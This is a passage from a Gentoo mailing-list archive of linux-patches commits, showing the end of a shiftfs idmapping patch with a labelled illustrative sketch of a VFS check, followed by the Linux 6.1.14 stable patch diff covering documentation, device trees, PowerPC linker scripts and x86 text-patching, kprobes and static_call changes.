+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 16 +++++++++++++---
+ 1 file changed, 13 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index cda74b614505..2664e1fb65d3 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -632,10 +632,10 @@ static int shiftfs_rename(struct user_namespace *ns,
+ 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
+ 		     *loweri_dir_new = lowerd_dir_new->d_inode;
+ 	struct renamedata rd = {
+-		.old_mnt_userns	= ns,
++		.old_mnt_userns	= &init_user_ns,
+ 		.old_dir	= loweri_dir_old,
+ 		.old_dentry	= lowerd_old,
+-		.new_mnt_userns	= ns,
++		.new_mnt_userns	= &init_user_ns,
+ 		.new_dir	= loweri_dir_new,
+ 		.new_dentry	= lowerd_new,
+ 	};
+@@ -971,7 +971,7 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
+ 		return -EOPNOTSUPP;
+ 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
+ 		return value ? -EACCES : 0;
+-	if (!inode_owner_or_capable(ns, inode))
++	if (!inode_owner_or_capable(&init_user_ns, inode))
+ 		return -EPERM;
+ 
+ 	if (value) {
+@@ -2015,6 +2015,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 		goto out_put_path;
+ 	}
+ 
++	/*
++	 * It makes no sense to handle idmapped layers from shiftfs.
++	 * And we didn't support it properly anyway.
++	 */
++	if (is_idmapped_mnt(path.mnt)) {
++		err = -EINVAL;
++		pr_err("idmapped layers are currently not supported\n");
++		goto out_put_path;
++	}
++
+ 	sb->s_flags |= SB_POSIXACL;
+ 
+ 	if (sbinfo->mark) {
+-- 
+2.39.2
+
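+As background for the EOVERFLOW symptom described in the commit message: in
+these kernels the VFS refuses creation in a directory when the caller's
+fsuid/fsgid cannot be represented once the mount's idmapping is applied. A
+simplified, illustrative sketch of that check, condensed from the helpers the
+message cites (not the exact in-tree code):
+
+	/* sketch of the may_create()-style gate, simplified */
+	static int sketch_may_create(struct user_namespace *mnt_userns,
+				     struct inode *dir)
+	{
+		/* unmappable fsuid/fsgid -> the EOVERFLOW users observed */
+		if (!fsuidgid_has_mapping(dir->i_sb, mnt_userns))
+			return -EOVERFLOW;
+		return 0;
+	}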


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-25 11:02 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-02-25 11:02 UTC (permalink / raw
  To: gentoo-commits

commit:     7ddeb328a51014d4b4d5cdf6a4f691d982aa06ad
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Sat Feb 25 10:58:21 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Sat Feb 25 10:58:21 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=7ddeb328

Linux patch 6.1.14

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    4 +
 1013_linux-6.1.14.patch | 2813 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2817 insertions(+)

diff --git a/0000_README b/0000_README
index dee78b52..4604bf4f 100644
--- a/0000_README
+++ b/0000_README
@@ -95,6 +95,10 @@ Patch:  1012_linux-6.1.13.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.13
 
+Patch:  1013_linux-6.1.14.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.14
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1013_linux-6.1.14.patch b/1013_linux-6.1.14.patch
new file mode 100644
index 00000000..ed2de6e9
--- /dev/null
+++ b/1013_linux-6.1.14.patch
@@ -0,0 +1,2813 @@
+diff --git a/Documentation/admin-guide/perf/hisi-pcie-pmu.rst b/Documentation/admin-guide/perf/hisi-pcie-pmu.rst
+index 294ebbdb22af8..bbe66480ff851 100644
+--- a/Documentation/admin-guide/perf/hisi-pcie-pmu.rst
++++ b/Documentation/admin-guide/perf/hisi-pcie-pmu.rst
+@@ -15,10 +15,10 @@ HiSilicon PCIe PMU driver
+ The PCIe PMU driver registers a perf PMU with the name of its sicl-id and PCIe
+ Core id.::
+ 
+-  /sys/bus/event_source/hisi_pcie<sicl>_<core>
++  /sys/bus/event_source/hisi_pcie<sicl>_core<core>
+ 
+ PMU driver provides description of available events and filter options in sysfs,
+-see /sys/bus/event_source/devices/hisi_pcie<sicl>_<core>.
++see /sys/bus/event_source/devices/hisi_pcie<sicl>_core<core>.
+ 
+ The "format" directory describes all formats of the config (events) and config1
+ (filter options) fields of the perf_event_attr structure. The "events" directory
+@@ -33,13 +33,13 @@ monitored by PMU.
+ Example usage of perf::
+ 
+   $# perf list
+-  hisi_pcie0_0/rx_mwr_latency/ [kernel PMU event]
+-  hisi_pcie0_0/rx_mwr_cnt/ [kernel PMU event]
++  hisi_pcie0_core0/rx_mwr_latency/ [kernel PMU event]
++  hisi_pcie0_core0/rx_mwr_cnt/ [kernel PMU event]
+   ------------------------------------------
+ 
+-  $# perf stat -e hisi_pcie0_0/rx_mwr_latency/
+-  $# perf stat -e hisi_pcie0_0/rx_mwr_cnt/
+-  $# perf stat -g -e hisi_pcie0_0/rx_mwr_latency/ -e hisi_pcie0_0/rx_mwr_cnt/
++  $# perf stat -e hisi_pcie0_core0/rx_mwr_latency/
++  $# perf stat -e hisi_pcie0_core0/rx_mwr_cnt/
++  $# perf stat -g -e hisi_pcie0_core0/rx_mwr_latency/ -e hisi_pcie0_core0/rx_mwr_cnt/
+ 
+ The current driver does not support sampling. So "perf record" is unsupported.
+ Also attach to a task is unsupported for PCIe PMU.
+@@ -64,7 +64,7 @@ bit8 is set, port=0x100; if these two Root Ports are both monitored, port=0x101.
+ 
+ Example usage of perf::
+ 
+-  $# perf stat -e hisi_pcie0_0/rx_mwr_latency,port=0x1/ sleep 5
++  $# perf stat -e hisi_pcie0_core0/rx_mwr_latency,port=0x1/ sleep 5
+ 
+ -bdf
+ 
+@@ -76,7 +76,7 @@ For example, "bdf=0x3900" means BDF of target Endpoint is 0000:39:00.0.
+ 
+ Example usage of perf::
+ 
+-  $# perf stat -e hisi_pcie0_0/rx_mrd_flux,bdf=0x3900/ sleep 5
++  $# perf stat -e hisi_pcie0_core0/rx_mrd_flux,bdf=0x3900/ sleep 5
+ 
+ 2. Trigger filter
+ Event statistics start when the first time TLP length is greater/smaller
+@@ -90,7 +90,7 @@ means start when TLP length < condition.
+ 
+ Example usage of perf::
+ 
+-  $# perf stat -e hisi_pcie0_0/rx_mrd_flux,trig_len=0x4,trig_mode=1/ sleep 5
++  $# perf stat -e hisi_pcie0_core0/rx_mrd_flux,trig_len=0x4,trig_mode=1/ sleep 5
+ 
+ 3. Threshold filter
+ Counter counts when TLP length within the specified range. You can set the
+@@ -103,4 +103,4 @@ when TLP length < threshold.
+ 
+ Example usage of perf::
+ 
+-  $# perf stat -e hisi_pcie0_0/rx_mrd_flux,thr_len=0x4,thr_mode=1/ sleep 5
++  $# perf stat -e hisi_pcie0_core0/rx_mrd_flux,thr_len=0x4,thr_mode=1/ sleep 5
+diff --git a/MAINTAINERS b/MAINTAINERS
+index d4822ae39e396..350d7e3ba94f9 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -3444,7 +3444,7 @@ F:	drivers/net/ieee802154/atusb.h
+ AUDIT SUBSYSTEM
+ M:	Paul Moore <paul@paul-moore.com>
+ M:	Eric Paris <eparis@redhat.com>
+-L:	linux-audit@redhat.com (moderated for non-subscribers)
++L:	audit@vger.kernel.org
+ S:	Supported
+ W:	https://github.com/linux-audit
+ T:	git git://git.kernel.org/pub/scm/linux/kernel/git/pcmoore/audit.git
+diff --git a/Makefile b/Makefile
+index e51356b982f90..3e82a32243626 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 13
++SUBLEVEL = 14
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/powerpc/boot/dts/fsl/qoriq-fman3-0-10g-2.dtsi b/arch/powerpc/boot/dts/fsl/qoriq-fman3-0-10g-2.dtsi
+new file mode 100644
+index 0000000000000..437dab3fc0176
+--- /dev/null
++++ b/arch/powerpc/boot/dts/fsl/qoriq-fman3-0-10g-2.dtsi
+@@ -0,0 +1,44 @@
++// SPDX-License-Identifier: BSD-3-Clause OR GPL-2.0-or-later
++/*
++ * QorIQ FMan v3 10g port #2 device tree stub [ controller @ offset 0x400000 ]
++ *
++ * Copyright 2022 Sean Anderson <sean.anderson@seco.com>
++ * Copyright 2012 - 2015 Freescale Semiconductor Inc.
++ */
++
++fman@400000 {
++	fman0_rx_0x08: port@88000 {
++		cell-index = <0x8>;
++		compatible = "fsl,fman-v3-port-rx";
++		reg = <0x88000 0x1000>;
++		fsl,fman-10g-port;
++	};
++
++	fman0_tx_0x28: port@a8000 {
++		cell-index = <0x28>;
++		compatible = "fsl,fman-v3-port-tx";
++		reg = <0xa8000 0x1000>;
++		fsl,fman-10g-port;
++	};
++
++	ethernet@e0000 {
++		cell-index = <0>;
++		compatible = "fsl,fman-memac";
++		reg = <0xe0000 0x1000>;
++		fsl,fman-ports = <&fman0_rx_0x08 &fman0_tx_0x28>;
++		ptp-timer = <&ptp_timer0>;
++		pcsphy-handle = <&pcsphy0>;
++	};
++
++	mdio@e1000 {
++		#address-cells = <1>;
++		#size-cells = <0>;
++		compatible = "fsl,fman-memac-mdio", "fsl,fman-xmdio";
++		reg = <0xe1000 0x1000>;
++		fsl,erratum-a011043; /* must ignore read errors */
++
++		pcsphy0: ethernet-phy@0 {
++			reg = <0x0>;
++		};
++	};
++};
+diff --git a/arch/powerpc/boot/dts/fsl/qoriq-fman3-0-10g-3.dtsi b/arch/powerpc/boot/dts/fsl/qoriq-fman3-0-10g-3.dtsi
+new file mode 100644
+index 0000000000000..ad116b17850a8
+--- /dev/null
++++ b/arch/powerpc/boot/dts/fsl/qoriq-fman3-0-10g-3.dtsi
+@@ -0,0 +1,44 @@
++// SPDX-License-Identifier: BSD-3-Clause OR GPL-2.0-or-later
++/*
++ * QorIQ FMan v3 10g port #3 device tree stub [ controller @ offset 0x400000 ]
++ *
++ * Copyright 2022 Sean Anderson <sean.anderson@seco.com>
++ * Copyright 2012 - 2015 Freescale Semiconductor Inc.
++ */
++
++fman@400000 {
++	fman0_rx_0x09: port@89000 {
++		cell-index = <0x9>;
++		compatible = "fsl,fman-v3-port-rx";
++		reg = <0x89000 0x1000>;
++		fsl,fman-10g-port;
++	};
++
++	fman0_tx_0x29: port@a9000 {
++		cell-index = <0x29>;
++		compatible = "fsl,fman-v3-port-tx";
++		reg = <0xa9000 0x1000>;
++		fsl,fman-10g-port;
++	};
++
++	ethernet@e2000 {
++		cell-index = <1>;
++		compatible = "fsl,fman-memac";
++		reg = <0xe2000 0x1000>;
++		fsl,fman-ports = <&fman0_rx_0x09 &fman0_tx_0x29>;
++		ptp-timer = <&ptp_timer0>;
++		pcsphy-handle = <&pcsphy1>;
++	};
++
++	mdio@e3000 {
++		#address-cells = <1>;
++		#size-cells = <0>;
++		compatible = "fsl,fman-memac-mdio", "fsl,fman-xmdio";
++		reg = <0xe3000 0x1000>;
++		fsl,erratum-a011043; /* must ignore read errors */
++
++		pcsphy1: ethernet-phy@0 {
++			reg = <0x0>;
++		};
++	};
++};
+diff --git a/arch/powerpc/boot/dts/fsl/t2081si-post.dtsi b/arch/powerpc/boot/dts/fsl/t2081si-post.dtsi
+index ecbb447920bc6..27714dc2f04a5 100644
+--- a/arch/powerpc/boot/dts/fsl/t2081si-post.dtsi
++++ b/arch/powerpc/boot/dts/fsl/t2081si-post.dtsi
+@@ -609,8 +609,8 @@
+ /include/ "qoriq-bman1.dtsi"
+ 
+ /include/ "qoriq-fman3-0.dtsi"
+-/include/ "qoriq-fman3-0-1g-0.dtsi"
+-/include/ "qoriq-fman3-0-1g-1.dtsi"
++/include/ "qoriq-fman3-0-10g-2.dtsi"
++/include/ "qoriq-fman3-0-10g-3.dtsi"
+ /include/ "qoriq-fman3-0-1g-2.dtsi"
+ /include/ "qoriq-fman3-0-1g-3.dtsi"
+ /include/ "qoriq-fman3-0-1g-4.dtsi"
+@@ -659,3 +659,19 @@
+ 		interrupts = <16 2 1 9>;
+ 	};
+ };
++
++&fman0_rx_0x08 {
++	/delete-property/ fsl,fman-10g-port;
++};
++
++&fman0_tx_0x28 {
++	/delete-property/ fsl,fman-10g-port;
++};
++
++&fman0_rx_0x09 {
++	/delete-property/ fsl,fman-10g-port;
++};
++
++&fman0_tx_0x29 {
++	/delete-property/ fsl,fman-10g-port;
++};
+diff --git a/arch/powerpc/kernel/vmlinux.lds.S b/arch/powerpc/kernel/vmlinux.lds.S
+index 8c3862b4c259d..a4c6efadc90c1 100644
+--- a/arch/powerpc/kernel/vmlinux.lds.S
++++ b/arch/powerpc/kernel/vmlinux.lds.S
+@@ -8,6 +8,7 @@
+ #define BSS_FIRST_SECTIONS *(.bss.prominit)
+ #define EMITS_PT_NOTE
+ #define RO_EXCEPTION_TABLE_ALIGN	0
++#define RUNTIME_DISCARD_EXIT
+ 
+ #define SOFT_MASK_TABLE(align)						\
+ 	. = ALIGN(align);						\
+@@ -410,9 +411,12 @@ SECTIONS
+ 	DISCARDS
+ 	/DISCARD/ : {
+ 		*(*.EMB.apuinfo)
+-		*(.glink .iplt .plt .rela* .comment)
++		*(.glink .iplt .plt .comment)
+ 		*(.gnu.version*)
+ 		*(.gnu.attributes)
+ 		*(.eh_frame)
++#ifndef CONFIG_RELOCATABLE
++		*(.rela*)
++#endif
+ 	}
+ }
+diff --git a/arch/powerpc/mm/book3s64/radix_pgtable.c b/arch/powerpc/mm/book3s64/radix_pgtable.c
+index 5a2384ed17279..26245aaf12b8b 100644
+--- a/arch/powerpc/mm/book3s64/radix_pgtable.c
++++ b/arch/powerpc/mm/book3s64/radix_pgtable.c
+@@ -234,6 +234,14 @@ void radix__mark_rodata_ro(void)
+ 	end = (unsigned long)__end_rodata;
+ 
+ 	radix__change_memory_range(start, end, _PAGE_WRITE);
++
++	for (start = PAGE_OFFSET; start < (unsigned long)_stext; start += PAGE_SIZE) {
++		end = start + PAGE_SIZE;
++		if (overlaps_interrupt_vector_text(start, end))
++			radix__change_memory_range(start, end, _PAGE_WRITE);
++		else
++			break;
++	}
+ }
+ 
+ void radix__mark_initmem_nx(void)
+@@ -268,6 +276,11 @@ static unsigned long next_boundary(unsigned long addr, unsigned long end)
+ 
+ 	// Relocatable kernel running at non-zero real address
+ 	if (stext_phys != 0) {
++		// The end of interrupts code at zero is a rodata boundary
++		unsigned long end_intr = __pa_symbol(__end_interrupts) - stext_phys;
++		if (addr < end_intr)
++			return end_intr;
++
+ 		// Start of relocated kernel text is a rodata boundary
+ 		if (addr < stext_phys)
+ 			return stext_phys;
+diff --git a/arch/s390/kernel/vmlinux.lds.S b/arch/s390/kernel/vmlinux.lds.S
+index f81d96710595a..cbf9c1b0beda4 100644
+--- a/arch/s390/kernel/vmlinux.lds.S
++++ b/arch/s390/kernel/vmlinux.lds.S
+@@ -17,6 +17,8 @@
+ /* Handle ro_after_init data on our own. */
+ #define RO_AFTER_INIT_DATA
+ 
++#define RUNTIME_DISCARD_EXIT
++
+ #define EMITS_PT_NOTE
+ 
+ #include <asm-generic/vmlinux.lds.h>
+diff --git a/arch/sh/kernel/vmlinux.lds.S b/arch/sh/kernel/vmlinux.lds.S
+index 3161b9ccd2a57..b6276a3521d73 100644
+--- a/arch/sh/kernel/vmlinux.lds.S
++++ b/arch/sh/kernel/vmlinux.lds.S
+@@ -4,6 +4,7 @@
+  * Written by Niibe Yutaka and Paul Mundt
+  */
+ OUTPUT_ARCH(sh)
++#define RUNTIME_DISCARD_EXIT
+ #include <asm/thread_info.h>
+ #include <asm/cache.h>
+ #include <asm/vmlinux.lds.h>
+diff --git a/arch/x86/include/asm/text-patching.h b/arch/x86/include/asm/text-patching.h
+index 1cc15528ce29b..85b85a275a434 100644
+--- a/arch/x86/include/asm/text-patching.h
++++ b/arch/x86/include/asm/text-patching.h
+@@ -183,6 +183,37 @@ void int3_emulate_ret(struct pt_regs *regs)
+ 	unsigned long ip = int3_emulate_pop(regs);
+ 	int3_emulate_jmp(regs, ip);
+ }
++
++static __always_inline
++void int3_emulate_jcc(struct pt_regs *regs, u8 cc, unsigned long ip, unsigned long disp)
++{
++	static const unsigned long jcc_mask[6] = {
++		[0] = X86_EFLAGS_OF,
++		[1] = X86_EFLAGS_CF,
++		[2] = X86_EFLAGS_ZF,
++		[3] = X86_EFLAGS_CF | X86_EFLAGS_ZF,
++		[4] = X86_EFLAGS_SF,
++		[5] = X86_EFLAGS_PF,
++	};
++
++	bool invert = cc & 1;
++	bool match;
++
++	if (cc < 0xc) {
++		match = regs->flags & jcc_mask[cc >> 1];
++	} else {
++		match = ((regs->flags & X86_EFLAGS_SF) >> X86_EFLAGS_SF_BIT) ^
++			((regs->flags & X86_EFLAGS_OF) >> X86_EFLAGS_OF_BIT);
++		if (cc >= 0xe)
++			match = match || (regs->flags & X86_EFLAGS_ZF);
++	}
++
++	if ((match && !invert) || (!match && invert))
++		ip += disp;
++
++	int3_emulate_jmp(regs, ip);
++}
++
+ #endif /* !CONFIG_UML_X86 */
+ 
+ #endif /* _ASM_X86_TEXT_PATCHING_H */
+diff --git a/arch/x86/kernel/alternative.c b/arch/x86/kernel/alternative.c
+index 5cadcea035e04..d1d92897ed6be 100644
+--- a/arch/x86/kernel/alternative.c
++++ b/arch/x86/kernel/alternative.c
+@@ -339,6 +339,12 @@ next:
+ 	}
+ }
+ 
++static inline bool is_jcc32(struct insn *insn)
++{
++	/* Jcc.d32 second opcode byte is in the range: 0x80-0x8f */
++	return insn->opcode.bytes[0] == 0x0f && (insn->opcode.bytes[1] & 0xf0) == 0x80;
++}
++
+ #if defined(CONFIG_RETPOLINE) && defined(CONFIG_OBJTOOL)
+ 
+ /*
+@@ -427,8 +433,7 @@ static int patch_retpoline(void *addr, struct insn *insn, u8 *bytes)
+ 	 *   [ NOP ]
+ 	 * 1:
+ 	 */
+-	/* Jcc.d32 second opcode byte is in the range: 0x80-0x8f */
+-	if (op == 0x0f && (insn->opcode.bytes[1] & 0xf0) == 0x80) {
++	if (is_jcc32(insn)) {
+ 		cc = insn->opcode.bytes[1] & 0xf;
+ 		cc ^= 1; /* invert condition */
+ 
+@@ -1311,6 +1316,11 @@ void text_poke_sync(void)
+ 	on_each_cpu(do_sync_core, NULL, 1);
+ }
+ 
++/*
++ * NOTE: crazy scheme to allow patching Jcc.d32 but not increase the size of
++ * this thing. When len == 6 everything is prefixed with 0x0f and we map
++ * opcode to Jcc.d8, using len to distinguish.
++ */
+ struct text_poke_loc {
+ 	/* addr := _stext + rel_addr */
+ 	s32 rel_addr;
+@@ -1432,6 +1442,10 @@ noinstr int poke_int3_handler(struct pt_regs *regs)
+ 		int3_emulate_jmp(regs, (long)ip + tp->disp);
+ 		break;
+ 
++	case 0x70 ... 0x7f: /* Jcc */
++		int3_emulate_jcc(regs, tp->opcode & 0xf, (long)ip, tp->disp);
++		break;
++
+ 	default:
+ 		BUG();
+ 	}
+@@ -1505,16 +1519,26 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 	 * Second step: update all but the first byte of the patched range.
+ 	 */
+ 	for (do_sync = 0, i = 0; i < nr_entries; i++) {
+-		u8 old[POKE_MAX_OPCODE_SIZE] = { tp[i].old, };
++		u8 old[POKE_MAX_OPCODE_SIZE+1] = { tp[i].old, };
++		u8 _new[POKE_MAX_OPCODE_SIZE+1];
++		const u8 *new = tp[i].text;
+ 		int len = tp[i].len;
+ 
+ 		if (len - INT3_INSN_SIZE > 0) {
+ 			memcpy(old + INT3_INSN_SIZE,
+ 			       text_poke_addr(&tp[i]) + INT3_INSN_SIZE,
+ 			       len - INT3_INSN_SIZE);
++
++			if (len == 6) {
++				_new[0] = 0x0f;
++				memcpy(_new + 1, new, 5);
++				new = _new;
++			}
++
+ 			text_poke(text_poke_addr(&tp[i]) + INT3_INSN_SIZE,
+-				  (const char *)tp[i].text + INT3_INSN_SIZE,
++				  new + INT3_INSN_SIZE,
+ 				  len - INT3_INSN_SIZE);
++
+ 			do_sync++;
+ 		}
+ 
+@@ -1542,8 +1566,7 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 		 * The old instruction is recorded so that the event can be
+ 		 * processed forwards or backwards.
+ 		 */
+-		perf_event_text_poke(text_poke_addr(&tp[i]), old, len,
+-				     tp[i].text, len);
++		perf_event_text_poke(text_poke_addr(&tp[i]), old, len, new, len);
+ 	}
+ 
+ 	if (do_sync) {
+@@ -1560,10 +1583,15 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 	 * replacing opcode.
+ 	 */
+ 	for (do_sync = 0, i = 0; i < nr_entries; i++) {
+-		if (tp[i].text[0] == INT3_INSN_OPCODE)
++		u8 byte = tp[i].text[0];
++
++		if (tp[i].len == 6)
++			byte = 0x0f;
++
++		if (byte == INT3_INSN_OPCODE)
+ 			continue;
+ 
+-		text_poke(text_poke_addr(&tp[i]), tp[i].text, INT3_INSN_SIZE);
++		text_poke(text_poke_addr(&tp[i]), &byte, INT3_INSN_SIZE);
+ 		do_sync++;
+ 	}
+ 
+@@ -1581,9 +1609,11 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 			       const void *opcode, size_t len, const void *emulate)
+ {
+ 	struct insn insn;
+-	int ret, i;
++	int ret, i = 0;
+ 
+-	memcpy((void *)tp->text, opcode, len);
++	if (len == 6)
++		i = 1;
++	memcpy((void *)tp->text, opcode+i, len-i);
+ 	if (!emulate)
+ 		emulate = opcode;
+ 
+@@ -1594,6 +1624,13 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 	tp->len = len;
+ 	tp->opcode = insn.opcode.bytes[0];
+ 
++	if (is_jcc32(&insn)) {
++		/*
++		 * Map Jcc.d32 onto Jcc.d8 and use len to distinguish.
++		 */
++		tp->opcode = insn.opcode.bytes[1] - 0x10;
++	}
++
+ 	switch (tp->opcode) {
+ 	case RET_INSN_OPCODE:
+ 	case JMP32_INSN_OPCODE:
+@@ -1610,7 +1647,6 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 		BUG_ON(len != insn.length);
+ 	};
+ 
+-
+ 	switch (tp->opcode) {
+ 	case INT3_INSN_OPCODE:
+ 	case RET_INSN_OPCODE:
+@@ -1619,6 +1655,7 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 	case CALL_INSN_OPCODE:
+ 	case JMP32_INSN_OPCODE:
+ 	case JMP8_INSN_OPCODE:
++	case 0x70 ... 0x7f: /* Jcc */
+ 		tp->disp = insn.immediate.value;
+ 		break;
+ 
+diff --git a/arch/x86/kernel/kprobes/core.c b/arch/x86/kernel/kprobes/core.c
+index 5be7f23099e1f..ea155f0cf545c 100644
+--- a/arch/x86/kernel/kprobes/core.c
++++ b/arch/x86/kernel/kprobes/core.c
+@@ -471,50 +471,26 @@ static void kprobe_emulate_call(struct kprobe *p, struct pt_regs *regs)
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_call);
+ 
+-static nokprobe_inline
+-void __kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs, bool cond)
++static void kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs)
+ {
+ 	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 
+-	if (cond)
+-		ip += p->ainsn.rel32;
++	ip += p->ainsn.rel32;
+ 	int3_emulate_jmp(regs, ip);
+ }
+-
+-static void kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs)
+-{
+-	__kprobe_emulate_jmp(p, regs, true);
+-}
+ NOKPROBE_SYMBOL(kprobe_emulate_jmp);
+ 
+-static const unsigned long jcc_mask[6] = {
+-	[0] = X86_EFLAGS_OF,
+-	[1] = X86_EFLAGS_CF,
+-	[2] = X86_EFLAGS_ZF,
+-	[3] = X86_EFLAGS_CF | X86_EFLAGS_ZF,
+-	[4] = X86_EFLAGS_SF,
+-	[5] = X86_EFLAGS_PF,
+-};
+-
+ static void kprobe_emulate_jcc(struct kprobe *p, struct pt_regs *regs)
+ {
+-	bool invert = p->ainsn.jcc.type & 1;
+-	bool match;
++	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 
+-	if (p->ainsn.jcc.type < 0xc) {
+-		match = regs->flags & jcc_mask[p->ainsn.jcc.type >> 1];
+-	} else {
+-		match = ((regs->flags & X86_EFLAGS_SF) >> X86_EFLAGS_SF_BIT) ^
+-			((regs->flags & X86_EFLAGS_OF) >> X86_EFLAGS_OF_BIT);
+-		if (p->ainsn.jcc.type >= 0xe)
+-			match = match || (regs->flags & X86_EFLAGS_ZF);
+-	}
+-	__kprobe_emulate_jmp(p, regs, (match && !invert) || (!match && invert));
++	int3_emulate_jcc(regs, p->ainsn.jcc.type, ip, p->ainsn.rel32);
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_jcc);
+ 
+ static void kprobe_emulate_loop(struct kprobe *p, struct pt_regs *regs)
+ {
++	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 	bool match;
+ 
+ 	if (p->ainsn.loop.type != 3) {	/* LOOP* */
+@@ -542,7 +518,9 @@ static void kprobe_emulate_loop(struct kprobe *p, struct pt_regs *regs)
+ 	else if (p->ainsn.loop.type == 1)	/* LOOPE */
+ 		match = match && (regs->flags & X86_EFLAGS_ZF);
+ 
+-	__kprobe_emulate_jmp(p, regs, match);
++	if (match)
++		ip += p->ainsn.rel32;
++	int3_emulate_jmp(regs, ip);
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_loop);
+ 
+diff --git a/arch/x86/kernel/static_call.c b/arch/x86/kernel/static_call.c
+index aaaba85d6d7ff..a9b54b795ebff 100644
+--- a/arch/x86/kernel/static_call.c
++++ b/arch/x86/kernel/static_call.c
+@@ -9,6 +9,7 @@ enum insn_type {
+ 	NOP = 1,  /* site cond-call */
+ 	JMP = 2,  /* tramp / site tail-call */
+ 	RET = 3,  /* tramp / site cond-tail-call */
++	JCC = 4,
+ };
+ 
+ /*
+@@ -25,12 +26,39 @@ static const u8 xor5rax[] = { 0x2e, 0x2e, 0x2e, 0x31, 0xc0 };
+ 
+ static const u8 retinsn[] = { RET_INSN_OPCODE, 0xcc, 0xcc, 0xcc, 0xcc };
+ 
++static u8 __is_Jcc(u8 *insn) /* Jcc.d32 */
++{
++	u8 ret = 0;
++
++	if (insn[0] == 0x0f) {
++		u8 tmp = insn[1];
++		if ((tmp & 0xf0) == 0x80)
++			ret = tmp;
++	}
++
++	return ret;
++}
++
++extern void __static_call_return(void);
++
++asm (".global __static_call_return\n\t"
++     ".type __static_call_return, @function\n\t"
++     "__static_call_return:\n\t"
++     ANNOTATE_NOENDBR
++     ANNOTATE_RETPOLINE_SAFE
++     "ret; int3\n\t"
++     ".size __static_call_return, . - __static_call_return \n\t");
++
+ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 					  void *func, bool modinit)
+ {
+ 	const void *emulate = NULL;
+ 	int size = CALL_INSN_SIZE;
+ 	const void *code;
++	u8 op, buf[6];
++
++	if ((type == JMP || type == RET) && (op = __is_Jcc(insn)))
++		type = JCC;
+ 
+ 	switch (type) {
+ 	case CALL:
+@@ -56,6 +84,20 @@ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 		else
+ 			code = &retinsn;
+ 		break;
++
++	case JCC:
++		if (!func) {
++			func = __static_call_return;
++			if (cpu_feature_enabled(X86_FEATURE_RETHUNK))
++				func = __x86_return_thunk;
++		}
++
++		buf[0] = 0x0f;
++		__text_gen_insn(buf+1, op, insn+1, func, 5);
++		code = buf;
++		size = 6;
++
++		break;
+ 	}
+ 
+ 	if (memcmp(insn, code, size) == 0)
+@@ -67,9 +109,9 @@ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 	text_poke_bp(insn, code, size, emulate);
+ }
+ 
+-static void __static_call_validate(void *insn, bool tail, bool tramp)
++static void __static_call_validate(u8 *insn, bool tail, bool tramp)
+ {
+-	u8 opcode = *(u8 *)insn;
++	u8 opcode = insn[0];
+ 
+ 	if (tramp && memcmp(insn+5, tramp_ud, 3)) {
+ 		pr_err("trampoline signature fail");
+@@ -78,7 +120,8 @@ static void __static_call_validate(void *insn, bool tail, bool tramp)
+ 
+ 	if (tail) {
+ 		if (opcode == JMP32_INSN_OPCODE ||
+-		    opcode == RET_INSN_OPCODE)
++		    opcode == RET_INSN_OPCODE ||
++		    __is_Jcc(insn))
+ 			return;
+ 	} else {
+ 		if (opcode == CALL_INSN_OPCODE ||
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index ce362e88a5676..0434bb7b456bd 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -3889,8 +3889,14 @@ static int svm_vcpu_pre_run(struct kvm_vcpu *vcpu)
+ 
+ static fastpath_t svm_exit_handlers_fastpath(struct kvm_vcpu *vcpu)
+ {
